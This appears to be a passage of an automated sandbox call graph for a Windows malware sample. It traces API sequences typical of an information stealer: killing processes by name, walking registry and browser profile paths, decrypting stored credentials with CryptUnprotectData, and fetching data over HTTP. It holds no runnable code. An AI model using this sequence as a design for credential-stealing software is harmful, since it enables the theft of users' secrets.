API calls 67265->67266 67267 3033834 67266->67267 67268 3032164 21 API calls 67267->67268 67269 30338cd 67268->67269 67270 3032164 21 API calls 67269->67270 67271 3033966 67270->67271 67272 3032164 21 API calls 67271->67272 67273 30339ff 67272->67273 67274 303b388 NtAllocateVirtualMemory 67273->67274 67275 3033a12 67274->67275 67277 3033ad6 67275->67277 67275->67304 67388 3036fc0 NtAllocateVirtualMemory 67275->67388 67278 3033b77 67277->67278 67389 3036fc0 NtAllocateVirtualMemory 67277->67389 67281 3033c18 67278->67281 67390 3036fc0 NtAllocateVirtualMemory 67278->67390 67282 3033cb9 67281->67282 67391 3036fc0 NtAllocateVirtualMemory 67281->67391 67285 3033d5a 67282->67285 67392 3036fc0 NtAllocateVirtualMemory 67282->67392 67284 3033a63 67284->67277 67295 303be64 3 API calls 67284->67295 67287 3033dfb 67285->67287 67393 3036fc0 NtAllocateVirtualMemory 67285->67393 67292 3033e9c 67287->67292 67394 3036fc0 NtAllocateVirtualMemory 67287->67394 67289 3033b04 67289->67278 67298 303be64 3 API calls 67289->67298 67290 3033ba5 67290->67281 67309 303be64 3 API calls 67290->67309 67293 3033f3d 67292->67293 67395 3036fc0 NtAllocateVirtualMemory 67292->67395 67303 3033fde 67293->67303 67396 3036fc0 NtAllocateVirtualMemory 67293->67396 67294 3034138 67399 3032988 NtFreeVirtualMemory 67294->67399 67301 3033abd 67295->67301 67297 3033c46 67297->67282 67311 303be64 3 API calls 67297->67311 67307 3033b5e 67298->67307 67300 3033ce7 67300->67285 67320 303be64 3 API calls 67300->67320 67310 303be64 3 API calls 67301->67310 67308 303408b 67303->67308 67397 3036fc0 NtAllocateVirtualMemory 67303->67397 67306 3033d88 67306->67287 67323 303be64 3 API calls 67306->67323 67312 303be64 3 API calls 67307->67312 67308->67294 67398 3036fc0 NtAllocateVirtualMemory 67308->67398 67315 3033bff 67309->67315 67316 3033acc 67310->67316 67318 3033ca0 67311->67318 67319 3033b6d 67312->67319 67313 3033e29 67313->67292 67332 303be64 3 API calls 67313->67332 67321 303be64 3 API calls 67315->67321 67322 30382b4 NtFreeVirtualMemory 67316->67322 67317 3033eca 67317->67293 67335 303be64 3 API calls 67317->67335 67324 303be64 3 API calls 67318->67324 67325 30382b4 NtFreeVirtualMemory 67319->67325 67327 3033d41 67320->67327 67328 3033c0e 67321->67328 67322->67277 67330 3033de2 67323->67330 67331 3033caf 67324->67331 67325->67278 67326 3033f6b 67326->67303 67343 303be64 3 API calls 67326->67343 67333 303be64 3 API calls 67327->67333 67334 30382b4 NtFreeVirtualMemory 67328->67334 67329 303400c 67329->67308 67346 303be64 3 API calls 67329->67346 67336 303be64 3 API calls 67330->67336 67337 30382b4 NtFreeVirtualMemory 67331->67337 67339 3033e83 67332->67339 67340 3033d50 67333->67340 67334->67281 67341 3033f24 67335->67341 67342 3033df1 67336->67342 67337->67282 67338 30340b9 67338->67294 67353 303be64 3 API calls 67338->67353 67344 303be64 3 API calls 67339->67344 67345 30382b4 NtFreeVirtualMemory 67340->67345 67347 303be64 3 API calls 67341->67347 67348 30382b4 NtFreeVirtualMemory 67342->67348 67349 3033fc5 67343->67349 67350 3033e92 67344->67350 67345->67285 67351 303406c 67346->67351 67352 3033f33 67347->67352 67348->67287 67354 303be64 3 API calls 67349->67354 67355 30382b4 NtFreeVirtualMemory 67350->67355 67356 303be64 3 API calls 67351->67356 67357 30382b4 NtFreeVirtualMemory 67352->67357 67358 3034119 67353->67358 67359 3033fd4 67354->67359 67355->67292 67360 303407e 67356->67360 67357->67293 67361 303be64 3 API calls 67358->67361 67362 30382b4 NtFreeVirtualMemory 67359->67362 67363 30382b4 NtFreeVirtualMemory 67360->67363 67364 303412b 67361->67364 67362->67303 67363->67308 67365 30382b4 NtFreeVirtualMemory 67364->67365 67365->67294 67367 30321e4 67366->67367 67368 30321f6 6 API calls 67367->67368 67400 3032134 67368->67400 67370 3032333 CreateProcessW 67371 303b388 NtAllocateVirtualMemory 67370->67371 67372 3032399 67371->67372 67373 303b388 NtAllocateVirtualMemory 67372->67373 67378 30323d6 67373->67378 67374 30325e8 67377 30325fa 67374->67377 67380 30382b4 NtFreeVirtualMemory 67374->67380 67375 3032401 PeekNamedPipe 67375->67378 67379 30324b9 PeekNamedPipe 67375->67379 67376 30325a0 TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 67376->67374 67377->67253 67378->67374 67378->67375 67378->67376 67378->67379 67381 3032569 GetExitCodeProcess 67378->67381 67384 3032468 ReadFile 67378->67384 67385 3032518 ReadFile 67378->67385 67401 303c704 NtDelayExecution 67378->67401 67379->67378 67379->67381 67380->67377 67381->67378 67382 303258f 67381->67382 67382->67376 67386 303be64 3 API calls 67384->67386 67387 303be64 3 API calls 67385->67387 67386->67379 67387->67381 67388->67284 67389->67289 67390->67290 67391->67297 67392->67300 67393->67306 67394->67313 67395->67317 67396->67326 67397->67329 67398->67338 67399->67304 67400->67370 67401->67378 67409 3037ac4 67402->67409 67404 3037b28 67405 3037c5d 67404->67405 67406 30382b4 NtFreeVirtualMemory 67404->67406 67407 3037c68 67405->67407 67408 30382b4 NtFreeVirtualMemory 67405->67408 67406->67405 67407->67232 67407->67234 67408->67407 67409->67404 67413 3037c12 67409->67413 67415 303900c 67409->67415 67435 303c00c NtAllocateVirtualMemory 67409->67435 67413->67404 67413->67409 67414 3037c37 67413->67414 67436 30376d8 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 67413->67436 67437 3038240 RtlInitUnicodeString NtCreateFile NtWriteFile NtClose 67413->67437 67414->67404 67416 303904b InternetOpenW 67415->67416 67417 303908b 67416->67417 67424 3039086 67416->67424 67438 30355dc 67417->67438 67419 3039248 67422 3039250 InternetCloseHandle 67419->67422 67423 303925b 67419->67423 67420 303923d InternetCloseHandle 67420->67419 67422->67423 67423->67409 67424->67419 67424->67420 67425 30390f4 67426 3039106 67425->67426 67428 30382b4 NtFreeVirtualMemory 67425->67428 67429 3039118 InternetOpenUrlW 67426->67429 67430 30382b4 NtFreeVirtualMemory 67426->67430 67428->67426 67429->67424 67432 3039154 67429->67432 67430->67429 67431 303915f InternetReadFile 67431->67432 67432->67424 67432->67431 67433 303b388 NtAllocateVirtualMemory 67432->67433 67460 303b648 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 67432->67460 67433->67432 67435->67409 67436->67413 67437->67413 67439 3035614 67438->67439 67440 303b388 NtAllocateVirtualMemory 67439->67440 67441 303563a 67440->67441 67442 303b388 NtAllocateVirtualMemory 67441->67442 67443 3035650 InternetCrackUrlW 67442->67443 67444 30356ac 67443->67444 67446 30356c6 67443->67446 67445 30382b4 NtFreeVirtualMemory 67444->67445 67447 30356b9 67445->67447 67446->67424 67446->67425 67449 303c860 67446->67449 67448 30382b4 NtFreeVirtualMemory 67447->67448 67448->67446 67450 303c894 InternetConnectW 67449->67450 67451 303c8df 67449->67451 67450->67451 67454 303c8e4 HttpOpenRequestW 67450->67454 67452 303c9e0 67451->67452 67453 303c9d5 InternetCloseHandle 67451->67453 67456 303c9f3 67452->67456 67457 303c9e8 InternetCloseHandle 67452->67457 67453->67452 67454->67451 67455 303c936 HttpSendRequestW 67454->67455 67458 303c9a7 HttpSendRequestW 67455->67458 67459 303c955 InternetQueryOptionW InternetSetOptionW 67455->67459 67456->67425 67457->67456 67458->67451 67459->67458 67460->67432 67462 303bbc5 67461->67462 67463 303bb62 67461->67463 67464 303bb8e CreateFileMappingA 67463->67464 67464->67462 67465 303bbcc MapViewOfFile 67464->67465 67465->67462 67467 303bbff 67465->67467 67466 303bcd5 VirtualFree 67468 30382b4 NtFreeVirtualMemory 67466->67468 67467->67466 67469 303b388 NtAllocateVirtualMemory 67467->67469 67470 303bd06 UnmapViewOfFile CloseHandle 67468->67470 67471 303bc35 67469->67471 67470->67462 67472 303bc62 67471->67472 67473 303be64 3 API calls 67472->67473 67474 303bc87 67473->67474 67475 303be64 3 API calls 67474->67475 67476 303bc99 67475->67476 67477 303bfc0 NtAllocateVirtualMemory 67476->67477 67478 303bcaf 67477->67478 67479 30382b4 NtFreeVirtualMemory 67478->67479 67480 303bccb 67479->67480 67481 30382b4 NtFreeVirtualMemory 67480->67481 67481->67466 67483 3034411 67482->67483 67484 303bfc0 NtAllocateVirtualMemory 67483->67484 67487 3034444 67484->67487 67485 30344a4 67486 30382b4 NtFreeVirtualMemory 67485->67486 67488 3034451 67486->67488 67487->67485 67487->67488 67489 303448f MessageBoxA 67487->67489 67489->67485 67490 303922b 67491 303904b InternetOpenW 67490->67491 67505 3039086 67490->67505 67492 303908b 67491->67492 67491->67505 67495 30355dc 3 API calls 67492->67495 67493 3039248 67496 3039250 InternetCloseHandle 67493->67496 67497 303925b 67493->67497 67494 303923d InternetCloseHandle 67494->67493 67498 30390ca 67495->67498 67496->67497 67500 30390f4 67498->67500 67501 303c860 8 API calls 67498->67501 67498->67505 67499 3039106 67503 3039118 InternetOpenUrlW 67499->67503 67504 30382b4 NtFreeVirtualMemory 67499->67504 67500->67499 67502 30382b4 NtFreeVirtualMemory 67500->67502 67501->67500 67502->67499 67503->67505 67507 3039154 67503->67507 67504->67503 67505->67493 67505->67494 67506 303915f InternetReadFile 67506->67507 67507->67505 67507->67506 67508 303b388 NtAllocateVirtualMemory 67507->67508 67510 303b648 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 67507->67510 67508->67507 67510->67507 67511 e45579c 67512 e4557a5 67511->67512 67513 e4557aa 67511->67513 67515 e454b50 67512->67515 67516 e454b9e 67515->67516 67517 e454c66 67516->67517 67750 e4511d4 GetProcAddress 67516->67750 67518 e454c6d __free_lconv_num 67517->67518 67761 e454948 CreateToolhelp32Snapshot 67517->67761 67518->67513 67522 e455037 67774 e456e54 67522->67774 67526 e454bfd 67526->67517 67751 e45189c GetProcAddress 67526->67751 67528 e455067 67531 e453cc0 21 API calls 67528->67531 67530 e454c06 67530->67517 67752 e4516f4 67530->67752 67532 e455084 67531->67532 67534 e453cc0 21 API calls 67532->67534 67536 e4550a5 67534->67536 67798 e45437c 67536->67798 67538 e4550b9 67540 e45437c 21 API calls 67538->67540 67542 e4550ca 67540->67542 67541 e454c13 67541->67517 67544 e454c62 67541->67544 67981 e45163c GetProcAddress 67541->67981 67805 e4571ac 67542->67805 67544->67517 67545 e4550ea 67824 e453c14 67545->67824 67547 e4550f9 67548 e453c14 21 API calls 67547->67548 67549 e45510a 67548->67549 67550 e453c14 21 API calls 67549->67550 67551 e45511b 67550->67551 67552 e453c14 21 API calls 67551->67552 67553 e45512b 67552->67553 67554 e453c14 21 API calls 67553->67554 67555 e45513b 67554->67555 67848 e456ed8 67555->67848 67559 e45515a 67560 e454a90 3 API calls 67559->67560 67561 e455177 67560->67561 67866 e456f6c 67561->67866 67563 e45517f 67872 e456e2c GetProcessHeap HeapAlloc 67563->67872 67565 e455184 67566 e456e54 3 API calls 67565->67566 67567 e455193 67566->67567 67873 e4575f8 67567->67873 67569 e4551a2 67883 e457c00 SHGetFolderPathA 67569->67883 67574 e456ed8 3 API calls 67575 e4551c8 67574->67575 67576 e454a90 3 API calls 67575->67576 67577 e4551df 67576->67577 67578 e454a90 3 API calls 67577->67578 67579 e4551f5 67578->67579 67580 e456f6c 2 API calls 67579->67580 67581 e4551fd 67580->67581 67895 e456e2c GetProcessHeap HeapAlloc 67581->67895 67583 e455202 67584 e456e54 3 API calls 67583->67584 67585 e455211 67584->67585 67586 e4575f8 13 API calls 67585->67586 67587 e455220 67586->67587 67896 e45842c SHGetFolderPathA 67587->67896 67590 e45842c 52 API calls 67591 e455234 67590->67591 67592 e457680 3 API calls 67591->67592 67593 e45523c 67592->67593 67594 e456ed8 3 API calls 67593->67594 67595 e455244 67594->67595 67596 e454a90 3 API calls 67595->67596 67597 e45525b 67596->67597 67598 e454a90 3 API calls 67597->67598 67599 e455271 67598->67599 67600 e456f6c 2 API calls 67599->67600 67601 e455279 67600->67601 67911 e456e2c GetProcessHeap HeapAlloc 67601->67911 67603 e45527e 67604 e456e54 3 API calls 67603->67604 67605 e45528d 67604->67605 67606 e4575f8 13 API calls 67605->67606 67607 e45529c 67606->67607 67912 e458848 RegOpenKeyExA 67607->67912 67611 e4552ac 67612 e457680 3 API calls 67611->67612 67613 e4552b4 67612->67613 67614 e456ed8 3 API calls 67613->67614 67615 e4552bc 67614->67615 67616 e454a90 3 API calls 67615->67616 67617 e4552d3 67616->67617 67618 e454a90 3 API calls 67617->67618 67619 e4552e9 67618->67619 67620 e456f6c 2 API calls 67619->67620 67621 e4552f1 67620->67621 67945 e456e2c GetProcessHeap HeapAlloc 67621->67945 67623 e4552f6 67624 e456e54 3 API calls 67623->67624 67625 e455305 67624->67625 67626 e4575f8 13 API calls 67625->67626 67627 e455314 67626->67627 67628 e457c00 37 API calls 67627->67628 67629 e45532a 67628->67629 67630 e457680 3 API calls 67629->67630 67631 e455332 67630->67631 67632 e456ed8 3 API calls 67631->67632 67633 e45533a 67632->67633 67634 e454a90 3 API calls 67633->67634 67635 e455351 67634->67635 67636 e454a90 3 API calls 67635->67636 67637 e455367 67636->67637 67638 e456f6c 2 API calls 67637->67638 67639 e45536f 67638->67639 67946 e456e2c GetProcessHeap HeapAlloc 67639->67946 67641 e455374 67642 e456e54 3 API calls 67641->67642 67643 e455383 67642->67643 67644 e4575f8 13 API calls 67643->67644 67645 e455392 67644->67645 67947 e45453c lstrcpyA lstrcatA RegOpenKeyExA 67645->67947 67647 e4553ac 67648 e4553b1 wsprintfA 67647->67648 67650 e4553da 67647->67650 67649 e45453c 23 API calls 67648->67649 67649->67647 67651 e4553f1 67650->67651 67653 e457680 3 API calls 67650->67653 67652 e457680 3 API calls 67651->67652 67654 e4553f9 67652->67654 67655 e4553e9 67653->67655 67656 e456ed8 3 API calls 67654->67656 67657 e457680 3 API calls 67655->67657 67658 e455401 67656->67658 67657->67651 67659 e454a90 3 API calls 67658->67659 67660 e455418 67659->67660 67661 e454a90 3 API calls 67660->67661 67662 e45542e 67661->67662 67663 e456f6c 2 API calls 67662->67663 67664 e455436 67663->67664 67964 e456e2c GetProcessHeap HeapAlloc 67664->67964 67666 e45543b 67667 e456e54 3 API calls 67666->67667 67668 e45544a 67667->67668 67669 e4575f8 13 API calls 67668->67669 67670 e455459 67669->67670 67965 e455abc SHGetFolderPathA 67670->67965 67673 e457680 3 API calls 67674 e455477 67673->67674 67675 e456ed8 3 API calls 67674->67675 67676 e45547f 67675->67676 67677 e454a90 3 API calls 67676->67677 67678 e455496 67677->67678 67679 e454a90 3 API calls 67678->67679 67680 e4554ac 67679->67680 67681 e456f6c 2 API calls 67680->67681 67682 e4554b4 67681->67682 67971 e456e2c GetProcessHeap HeapAlloc 67682->67971 67684 e4554b9 67685 e456e54 3 API calls 67684->67685 67686 e4554c8 67685->67686 67687 e4575f8 13 API calls 67686->67687 67688 e4554d7 SHGetFolderPathA 67687->67688 67689 e455537 67688->67689 67690 e4554fd lstrcatA 67688->67690 67692 e457680 3 API calls 67689->67692 67982 e456604 lstrcpyA lstrlenA 67690->67982 67693 e45553f 67692->67693 67694 e456ed8 3 API calls 67693->67694 67695 e455547 67694->67695 67696 e454a90 3 API calls 67695->67696 67697 e45555e 67696->67697 67698 e454a90 3 API calls 67697->67698 67699 e455574 67698->67699 67700 e456f6c 2 API calls 67699->67700 67701 e45557c 67700->67701 67972 e456e2c GetProcessHeap HeapAlloc 67701->67972 67703 e455581 67704 e456e54 3 API calls 67703->67704 67705 e455590 67704->67705 67706 e4575f8 13 API calls 67705->67706 67707 e45559f 67706->67707 67973 e455d94 SHGetFolderPathA 67707->67973 67710 e457680 3 API calls 67711 e4555af 67710->67711 67712 e456ed8 3 API calls 67711->67712 67713 e4555b7 67712->67713 67714 e454a90 3 API calls 67713->67714 67715 e4555ce 67714->67715 67716 e454a90 3 API calls 67715->67716 67717 e4555e4 67716->67717 67718 e456f6c 2 API calls 67717->67718 67719 e4555ec 67718->67719 67980 e456e2c GetProcessHeap HeapAlloc 67719->67980 67721 e4555f1 67722 e456e54 3 API calls 67721->67722 67723 e455600 67722->67723 67724 e4575f8 13 API calls 67723->67724 67725 e45560f 67724->67725 67726 e455abc 37 API calls 67725->67726 67727 e455625 67726->67727 67728 e457680 3 API calls 67727->67728 67729 e45562d 67728->67729 67730 e456ed8 3 API calls 67729->67730 67731 e455635 67730->67731 67732 e454a90 3 API calls 67731->67732 67733 e45564c 67732->67733 67734 e454a90 3 API calls 67733->67734 67735 e455662 67734->67735 67736 e456f6c 2 API calls 67735->67736 67737 e45566a 67736->67737 67737->67518 67738 e455690 GetProcessHeap HeapAlloc 67737->67738 67739 e455688 67737->67739 67738->67739 67743 e4556b4 wcsftime 67738->67743 67740 e455756 GetProcessHeap 67739->67740 67741 e45576a __free_lconv_num 67739->67741 67740->67741 67741->67518 67742 e45576f GetProcessHeap 67741->67742 67742->67518 67744 e4556e2 OpenFileMappingA 67743->67744 67745 e455701 MapViewOfFile UnmapViewOfFile CloseHandle 67744->67745 67746 e455733 67744->67746 67745->67746 67996 e454824 32 API calls wprintf 67746->67996 67748 e455742 67997 e454878 29 API calls wprintf 67748->67997 67750->67526 67751->67530 67755 e451754 memcpy_s 67752->67755 67753 e45117c GetSystemDirectoryW NtAllocateVirtualMemory 67753->67755 67754 e451872 67754->67517 67754->67541 67755->67753 67755->67754 67755->67755 67757 e4517e8 FindFirstFileW 67755->67757 67759 e451827 FindNextFileW 67755->67759 67760 e45183b LoadLibraryW 67755->67760 67998 e4524c0 67755->67998 68008 e45248c 67755->68008 67757->67755 67759->67755 67760->67755 67762 e45497c Process32First 67761->67762 67763 e454a6f 67761->67763 67764 e454a66 CloseHandle 67762->67764 67765 e45499a __security_init_cookie 67762->67765 67773 e456e2c GetProcessHeap HeapAlloc 67763->67773 67764->67763 67766 e454a50 Process32Next 67765->67766 67767 e4549c2 OpenProcess 67765->67767 67766->67764 67766->67765 67767->67766 67768 e4549d7 StrStrIA StrStrIA StrStrIA 67767->67768 67769 e454a33 67768->67769 67770 e454a3c TerminateProcess 67768->67770 67769->67770 67771 e454a38 67769->67771 67772 e454a47 CloseHandle 67770->67772 67771->67770 67771->67772 67772->67766 67773->67522 67775 e456e71 67774->67775 67776 e455046 67774->67776 67777 e456e95 67775->67777 67778 e456e82 67775->67778 67787 e453cc0 67776->67787 67779 e456eb1 67777->67779 67785 e456e9a 67777->67785 68013 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67778->68013 68016 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67779->68016 67783 e456ec0 67783->67776 67784 e456e8a 68014 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67784->68014 67785->67779 68015 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67785->68015 67789 e453cda 67787->67789 67788 e453d3b 67790 e453d41 67788->67790 67791 e453dbf 67788->67791 67789->67788 67792 e453d14 67789->67792 67797 e453d36 memcpy_s 67790->67797 68018 e4540ac 21 API calls new 67790->68018 68019 e4d5280 10 API calls 2 library calls 67791->68019 68017 e453dcc 10 API calls std::_Xinvalid_argument 67792->68017 67797->67528 67799 e45439e 67798->67799 67800 e4543b9 67798->67800 67799->67800 67801 e4543ac 67799->67801 68021 e453ef4 67800->68021 68020 e4543e0 21 API calls 2 library calls 67801->68020 67804 e4543b7 67804->67538 67806 e4571f2 67805->67806 67807 e4571eb __free_lconv_num 67805->67807 67808 e4571f7 67806->67808 67809 e45721d 67806->67809 67807->67545 68030 e456830 5 API calls __free_lconv_num 67808->68030 67810 e457267 67809->67810 67814 e457214 67809->67814 68032 e4570a0 7 API calls 67810->68032 67814->67807 67814->67809 68031 e456830 5 API calls __free_lconv_num 67814->68031 67815 e45723f 67817 e457243 67815->67817 67818 e45725e 67815->67818 67816 e457278 67819 e457293 __free_lconv_num 67816->67819 67820 e45727f GetProcessHeap 67816->67820 67817->67807 67821 e457248 GetProcessHeap 67817->67821 67818->67810 67819->67807 67822 e457298 GetProcessHeap 67819->67822 67820->67819 67823 e45725c __free_lconv_num 67821->67823 67822->67807 67823->67807 67825 e453c2d memcpy_s 67824->67825 67835 e453c71 67824->67835 67826 e453ca6 67825->67826 67827 e453c59 67825->67827 67825->67835 68033 e4e1fcc 19 API calls _invalid_parameter_noinfo_noreturn 67826->68033 67828 e453c62 67827->67828 67829 e453cab 67827->67829 67832 e453cb1 67828->67832 67833 e453c6b 67828->67833 68034 e4e1fcc 19 API calls _invalid_parameter_noinfo_noreturn 67829->68034 68035 e4e1fcc 19 API calls _invalid_parameter_noinfo_noreturn 67832->68035 67833->67835 67836 e453cb7 67833->67836 67835->67547 68036 e4e1fcc 19 API calls _invalid_parameter_noinfo_noreturn 67836->68036 67849 e456eee 67848->67849 67850 e455143 67848->67850 67851 e456f40 67849->67851 68037 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67849->68037 67860 e454a90 67850->67860 68040 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67851->68040 67854 e456f14 68038 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67854->68038 67855 e456f4d 67855->67850 68041 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67855->68041 67857 e456f21 67857->67851 68039 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67857->68039 67861 e454abd 67860->67861 67861->67861 67862 e454ae0 GetProcessHeap 67861->67862 67863 e454adb memcpy_s 67861->67863 67864 e454af3 HeapReAlloc 67862->67864 67865 e454b02 HeapAlloc 67862->67865 67863->67559 67864->67863 67865->67863 67867 e456f71 67866->67867 67871 e456fb4 __free_lconv_num 67866->67871 67868 e456f87 GetProcessHeap 67867->67868 67869 e456fa0 GetProcessHeap 67867->67869 67870 e456f9b __free_lconv_num 67868->67870 67869->67871 67870->67869 67871->67563 67872->67565 67874 e45761d 67873->67874 67881 e457619 __free_lconv_num 67873->67881 67875 e457622 67874->67875 67876 e457648 67874->67876 68042 e456830 5 API calls __free_lconv_num 67875->68042 68043 e45750c 7 API calls 67876->68043 67879 e457656 67879->67881 67882 e45765d GetProcessHeap 67879->67882 67880 e45763f 67880->67876 67880->67881 67881->67569 67882->67881 67884 e457c4c lstrcatA lstrlenA 67883->67884 67885 e4551b8 67883->67885 67884->67885 67886 e457c73 67884->67886 67889 e457680 67885->67889 67886->67885 67887 e457c7d lstrcpyA lstrcpyA lstrcatA lstrlenA lstrcpyA 67886->67887 68044 e457a88 67887->68044 67890 e457692 67889->67890 67891 e4551c0 67889->67891 68087 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67890->68087 67891->67574 67894 e4576d3 67894->67891 67895->67583 67897 e458470 lstrcatA 67896->67897 67904 e45522a 67896->67904 67898 e4584c0 67897->67898 67899 e458499 67897->67899 68088 e453698 67898->68088 67901 e456604 15 API calls 67899->67901 67902 e4584be 67901->67902 67902->67904 67906 e457680 3 API calls 67902->67906 67904->67590 67905 e456604 15 API calls 67909 e4584ee 67905->67909 67907 e458544 67906->67907 67908 e457680 3 API calls 67907->67908 67908->67904 67909->67902 67910 e458526 FreeLibrary 67909->67910 67910->67902 67911->67603 67913 e4552a4 67912->67913 67914 e45888f CoInitialize CoCreateInstance 67912->67914 67929 e4589e4 67913->67929 67915 e4589c2 RegCloseKey 67914->67915 67916 e4588c2 67914->67916 67915->67913 67916->67915 67918 e4588cf 67916->67918 67917 e458986 RegCloseKey 67920 e4589bb 67917->67920 67921 e4589ab 67917->67921 67918->67917 67924 e45892c StrStrIW 67918->67924 68187 e458568 23 API calls 67918->68187 67920->67913 67922 e457680 3 API calls 67921->67922 67923 e4589b3 67922->67923 67925 e457680 3 API calls 67923->67925 67924->67918 67925->67920 67927 e458952 CoTaskMemFree 67927->67918 67928 e458965 CoTaskMemFree 67927->67928 67928->67918 67930 e458a14 LoadLibraryA 67929->67930 67943 e458b1e 67929->67943 67931 e458a2d 6 API calls 67930->67931 67934 e458b08 67930->67934 67932 e458aff FreeLibrary 67931->67932 67933 e458aca 67931->67933 67932->67934 67933->67932 67935 e458af3 67933->67935 67934->67611 67935->67943 67936 e458d00 67936->67934 67937 e457680 3 API calls 67936->67937 67938 e458d10 67937->67938 67939 e457680 3 API calls 67938->67939 67939->67934 67942 e4570a0 7 API calls 67942->67943 67943->67934 67943->67936 67943->67942 67944 e457680 3 API calls 67943->67944 68188 e4548cc 7 API calls 67943->68188 68189 e45750c 7 API calls 67943->68189 67944->67943 67945->67623 67946->67641 67948 e4545a6 67947->67948 67949 e4545ad RegEnumKeyExA 67947->67949 67948->67647 67950 e4547f5 RegCloseKey 67949->67950 67958 e4545f6 67949->67958 67950->67948 67951 e454606 RegOpenKeyExA 67952 e4547ad RegEnumKeyExA 67951->67952 67951->67958 67952->67950 67952->67958 67953 e457680 3 API calls 67955 e4547a2 RegCloseKey 67953->67955 67954 e454648 lstrcpyW RegQueryValueExW 67954->67958 67955->67952 67958->67951 67958->67952 67958->67953 67958->67954 67958->67955 67960 e454714 CryptUnprotectData 67958->67960 68190 e4548cc 7 API calls 67958->68190 68191 e45750c 7 API calls 67958->68191 68192 e4570a0 7 API calls 67958->68192 68193 e457474 11 API calls 67958->68193 68194 e4570a0 7 API calls 67958->68194 67960->67958 67963 e454779 LocalFree 67963->67958 67964->67666 67966 e45546f 67965->67966 67967 e455b08 lstrcatA lstrlenA 67965->67967 67966->67673 67967->67966 67968 e455b2f 67967->67968 67968->67966 67969 e455b39 lstrcpyA lstrcpyA lstrcatA lstrlenA lstrcpyA 67968->67969 68195 e455944 67969->68195 67971->67684 67972->67703 67974 e455dc0 67973->67974 67975 e455ded SHGetFolderPathA 67973->67975 67976 e456604 15 API calls 67974->67976 67977 e455e0d lstrcatA 67975->67977 67978 e4555a7 67975->67978 67976->67975 67979 e456604 15 API calls 67977->67979 67978->67710 67979->67978 67980->67721 67981->67541 67983 e456651 lstrcatA 67982->67983 67984 e456668 lstrcatA FindFirstFileA 67982->67984 67983->67984 67985 e456696 67984->67985 67986 e456822 67984->67986 67987 e45679c lstrcpyA 67985->67987 67988 e45678a StrStrIA 67985->67988 67989 e4566c6 lstrcpyA 67985->67989 67990 e456804 FindNextFileA 67985->67990 67995 e456819 FindClose 67985->67995 67986->67689 67991 e4567c4 lstrcatA 67987->67991 67992 e4567b2 lstrcatA 67987->67992 67988->67987 67988->67990 67993 e4566dc lstrcatA 67989->67993 67994 e4566ee lstrcatA lstrcatA 67989->67994 67990->67985 67990->67995 67991->67985 67992->67991 67993->67994 67994->67985 67995->67986 67996->67748 67997->67739 67999 e4524f1 67998->67999 68000 e4524e0 67998->68000 68002 e452513 67999->68002 68003 e4524fd VirtualQuery 67999->68003 68001 e45248c NtFreeVirtualMemory 68000->68001 68005 e4524e8 68001->68005 68004 e452522 68002->68004 68011 e45241c NtAllocateVirtualMemory 68002->68011 68003->68002 68004->68005 68007 e45248c NtFreeVirtualMemory 68004->68007 68005->67755 68007->68005 68009 e452491 NtFreeVirtualMemory 68008->68009 68010 e4524bc 68008->68010 68009->68010 68010->67755 68012 e45245a memcpy_s 68011->68012 68012->68004 68013->67784 68014->67777 68015->67785 68016->67783 68020->67804 68022 e453fe9 68021->68022 68029 e4d52a4 10 API calls 2 library calls 68022->68029 68030->67814 68031->67815 68032->67816 68037->67854 68038->67857 68039->67857 68040->67855 68041->67850 68042->67880 68043->67879 68045 e457708 6 API calls 68044->68045 68046 e457ab5 CopyFileA 68045->68046 68047 e457ae2 68046->68047 68048 e457aca wcsftime 68046->68048 68047->68048 68061 e455e5c 68047->68061 68048->67886 68050 e457b06 68050->68048 68051 e457b67 68050->68051 68052 e457b31 GetProcessHeap HeapAlloc 68050->68052 68054 e4a7ee8 CloseHandle 68051->68054 68052->68051 68053 e457b51 68052->68053 68053->68051 68055 e457b99 68054->68055 68056 e457bb6 GetProcessHeap 68055->68056 68057 e457ba2 GetProcessHeap 68055->68057 68059 e457bca __free_lconv_num 68056->68059 68075 e4f5180 68057->68075 68060 e457bd8 DeleteFileA 68059->68060 68060->68048 68077 e456500 CreateFileA 68061->68077 68064 e455e85 __free_lconv_num 68064->68050 68065 e455e92 StrStrIA 68066 e455fb5 GetProcessHeap 68065->68066 68067 e455eaf StrChrA 68065->68067 68066->68064 68067->68066 68068 e455eca 68067->68068 68068->68066 68069 e455f01 CryptUnprotectData 68068->68069 68069->68066 68070 e455f38 GetProcessHeap HeapAlloc 68069->68070 68070->68066 68071 e455f58 68070->68071 68072 e455fa1 LocalFree 68071->68072 68073 e455f6a GetProcessHeap HeapAlloc 68071->68073 68072->68066 68073->68072 68074 e455f8a 68073->68074 68074->68072 68076 e4f5182 68075->68076 68078 e456551 GetFileSize 68077->68078 68079 e455e81 68077->68079 68080 e45656b GetProcessHeap HeapAlloc 68078->68080 68083 e456565 __free_lconv_num 68078->68083 68079->68064 68079->68065 68082 e45658f 68080->68082 68080->68083 68081 e4565e3 CloseHandle 68081->68079 68084 e45659e ReadFile 68082->68084 68085 e45659a 68082->68085 68083->68081 68084->68085 68085->68081 68086 e4565cf GetProcessHeap 68085->68086 68086->68083 68087->67894 68121 e45343c 68088->68121 68090 e4536bc 68091 e4537ae 68090->68091 68095 e453cc0 21 API calls 68090->68095 68152 e4541d0 68091->68152 68097 e4536fb 68095->68097 68096 e453c14 21 API calls 68098 e4537ea 68096->68098 68099 e4541d0 21 API calls 68097->68099 68100 e4538f0 68098->68100 68101 e4537fa 7 API calls 68098->68101 68102 e453710 68099->68102 68105 e453c14 21 API calls 68100->68105 68101->68100 68103 e4538b9 68101->68103 68165 e454340 10 API calls 68102->68165 68103->68100 68107 e4538fe 68105->68107 68106 e453721 68108 e453c14 21 API calls 68106->68108 68107->67902 68107->67905 68109 e453730 68108->68109 68110 e453cc0 21 API calls 68109->68110 68111 e45374f 